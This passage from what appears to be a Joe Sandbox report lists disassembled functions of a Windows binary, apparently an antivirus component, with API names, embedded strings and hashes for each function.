                                  Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                  • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                  • API String ID: 883923345-381368982
                                  • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                  • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                  Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                  • String ID:
                                  • API String ID: 1613947383-0
                                  • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                  • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                  Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                  • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                  Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                  • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                  Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                  • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 93015348-1041928032
                                  • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                  • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                  Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                  • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                  • GetProcAddress.KERNEL32 ref: 000000014000F117
                                    • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressProc$Load$Library
                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                  • API String ID: 3981747205-232180764
                                  • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                  • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                  • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                  • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                  Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                  • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                  • API String ID: 3682727354-300733478
                                  • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                  • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                  Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                  • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                  • API String ID: 2587151837-1427723692
                                  • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                  • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                  Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                  • String ID: SetDllDirectoryW$kernel32.dll
                                  • API String ID: 3184163350-3826188083
                                  • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                  • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                  Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3424473247-996641649
                                  • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                  • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                  Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1775797328-0
                                  • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                  • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                  Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                  • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 1232609184-0
                                  • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                  • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                  Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                  • String ID: H
                                  • API String ID: 2107338056-2852464175
                                  • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                  • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                  Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                  • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                  • API String ID: 1322048431-2685357988
                                  • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                  • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                  Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                  • API String ID: 2984211723-3002863673
                                  • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                  • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                  Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                  • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                  • API String ID: 678758403-4129911376
                                  • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                  • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                  Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3424473247-0
                                  • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                  • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                  Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                  • String ID: bad exception$csm$csm$csm
                                  • API String ID: 3766904988-820278400
                                  • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                  • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                  Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
